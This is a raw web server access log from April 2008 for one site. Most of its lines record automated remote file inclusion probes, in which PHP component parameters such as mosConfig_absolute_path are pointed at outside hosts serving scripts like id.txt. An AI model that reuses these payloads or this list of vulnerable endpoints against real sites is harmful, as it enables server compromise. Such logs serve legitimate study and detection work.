213.219.217.74 - - [17/Apr/2008:11:53:25 -0700] "GET //com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:53:25 -0700] "GET /logs//com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:11:53:28 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:11:53:31 -0700] "GET //config/dbutil.bck.php?confdir=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:11:53:33 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.232.122.239 - - [17/Apr/2008:11:54:00 -0700] "GET /logs/access.log//com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.122.239 - - [17/Apr/2008:11:54:00 -0700] "GET //com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.122.239 - - [17/Apr/2008:11:54:00 -0700] "GET /logs//com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:54:16 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:54:17 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.182.191.76 - - [17/Apr/2008:11:54:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.articles-free.com/images/icons/do.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.203.110 - - [17/Apr/2008:11:54:38 -0700] "GET /index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/uploader/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.97 - - [17/Apr/2008:11:54:44 -0700] "GET /logs/access_080329.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.14.1.101 - - [17/Apr/2008:11:55:40 -0700] "GET /logs/access_080312.log//init_basic.php?GALLERY_BASEDIR=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.1.101 - - [17/Apr/2008:11:55:40 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.14.1.101 - - [17/Apr/2008:11:55:40 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://www.joomla.teafree.pl/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.67.26.5 - - [17/Apr/2008:11:56:37 -0700] "GET /logs/newspublish/samplenewspublish.php?path[docroot]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
80.67.26.5 - - [17/Apr/2008:11:56:37 -0700] "GET /newspublish/samplenewspublish.php?path[docroot]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:11:57:47 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:11:57:47 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:11:57:47 -0700] "GET /include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:11:57:48 -0700] "GET /include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:11:57:48 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:11:57:48 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:53 -0700] "GET /logs/access.log///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:53 -0700] "GET /logs/access.log///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:53 -0700] "GET /logs/access.log///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:53 -0700] "GET /logs/access.log///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:54 -0700] "GET ///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:55 -0700] "GET /logs///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.70.35.179 - - [17/Apr/2008:11:57:56 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:57 -0700] "GET ///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:57 -0700] "GET ///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:57 -0700] "GET ///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:57 -0700] "GET /logs///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:57 -0700] "GET /logs///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:57:57 -0700] "GET /logs///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:58:12 -0700] "GET /logs/access_080226.log///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:58:14 -0700] "GET /logs/access_080226.log///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:58:14 -0700] "GET /logs/access_080226.log///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.15.10.228 - - [17/Apr/2008:11:58:14 -0700] "GET /logs/access_080226.log///index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://m4r0c.com/rfi-scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:11:58:56 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:11:58:57 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:11:59:05 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.40.17.23 - - [17/Apr/2008:11:59:15 -0700] "GET /logs/access_080117.log///sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.40.17.23 - - [17/Apr/2008:11:59:15 -0700] "GET ///sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.40.17.23 - - [17/Apr/2008:11:59:15 -0700] "GET /logs///sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:59:27 -0700] "GET /logs/access_080215.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:59:27 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:11:59:28 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.155.227.84 - - [17/Apr/2008:11:59:44 -0700] "GET /logs/access.log//display.php?page=&lang=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.155.227.84 - - [17/Apr/2008:11:59:46 -0700] "GET //display.php?page=&lang=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.155.227.84 - - [17/Apr/2008:11:59:48 -0700] "GET /logs//display.php?page=&lang=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:12:00:25 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.67.24.32 - - [17/Apr/2008:12:00:28 -0700] "GET /logs/access_080321.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:12:00:28 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:12:00:28 -0700] "GET /include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:12:00:29 -0700] "GET /include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:12:00:29 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:12:00:29 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:00:40 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:00:41 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:12:00:51 -0700] "GET /logs/access.log//com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:12:00:52 -0700] "GET //com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:12:00:52 -0700] "GET /logs//com_expose&Itemid=&mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:01:03 -0700] "GET /logs/index.phpmain.php?x=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:12:01:03 -0700] "GET /index.phpmain.php?x=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 5001 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
209.97.203.110 - - [17/Apr/2008:12:01:44 -0700] "GET /logs/access_080223.log/index.php?option=com_securityimages&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/uploader/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.241.35.170 - - [17/Apr/2008:12:02:41 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.trackscotland.co.uk//id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.241.35.170 - - [17/Apr/2008:12:02:42 -0700] "GET //skin/zero_vote/error.php?dir=http://www.trackscotland.co.uk//id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.241.35.170 - - [17/Apr/2008:12:02:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.trackscotland.co.uk//id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.241.35.170 - - [17/Apr/2008:12:02:42 -0700] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://www.trackscotland.co.uk//id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.241.35.170 - - [17/Apr/2008:12:02:43 -0700] "GET //skin/zero_vote/error.php?dir=http://www.trackscotland.co.uk//id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.241.35.170 - - [17/Apr/2008:12:02:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.trackscotland.co.uk//id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:12:04:28 -0700] "GET /logs/access_080315.log//atom.php5?page=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:12:04:30 -0700] "GET //atom.php5?page=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:12:04:32 -0700] "GET /logs//atom.php5?page=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.172.10 - - [17/Apr/2008:12:04:57 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.172.10 - - [17/Apr/2008:12:04:57 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.172.10 - - [17/Apr/2008:12:04:57 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.172.10 - - [17/Apr/2008:12:04:58 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.67.218.74 - - [17/Apr/2008:12:06:50 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
209.67.218.74 - - [17/Apr/2008:12:06:50 -0700] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
84.40.17.23 - - [17/Apr/2008:12:06:52 -0700] "GET /logs/access_080215.log///sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.cyos.co.kr/bbs/data1/memo?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:12:08:10 -0700] "GET /logs/access_080215.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:12:08:10 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.23.237.236 - - [17/Apr/2008:12:08:10 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.241.35.170 - - [17/Apr/2008:12:08:58 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.trackscotland.co.uk//id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.241.35.170 - - [17/Apr/2008:12:09:01 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.trackscotland.co.uk//id2[1]-Naira.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.249.132.194 - - [17/Apr/2008:12:09:03 -0700] "GET /logs/access_080329.log//atom.php5?page=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:12:10:01 -0700] "GET /logs/access_071129.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:12:10:05 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.19.194 - - [17/Apr/2008:12:10:08 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.122.239 - - [17/Apr/2008:12:10:43 -0700] "GET /logs/access_080215.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.122.239 - - [17/Apr/2008:12:10:43 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.122.239 - - [17/Apr/2008:12:10:43 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.23.216 - - [17/Apr/2008:12:11:27 -0700] "GET /logs/access_071226.log HTTP/1.0" 200 357658 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.32.94.50 - - [17/Apr/2008:12:12:33 -0700] "GET /scanhttp://www.quotationsforlife.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
216.32.94.50 - - [17/Apr/2008:12:12:49 -0700] "GET /logs/scanhttp://www.quotationsforlife.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:12:13:51 -0700] "GET /logs/database.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:13:52 -0700] "GET /logs/access_080127.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:13:52 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:12:13:52 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://deddi.uni.cc/tools/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:12:13:53 -0700] "GET /database.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
77.91.224.9 - - [17/Apr/2008:12:14:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
77.91.224.9 - - [17/Apr/2008:12:14:53 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.dmulk.com"
77.67.5.27 - - [17/Apr/2008:12:16:25 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:12:18:08 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:12:18:08 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
80.67.24.32 - - [17/Apr/2008:12:18:36 -0700] "GET /logs/access_080329.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
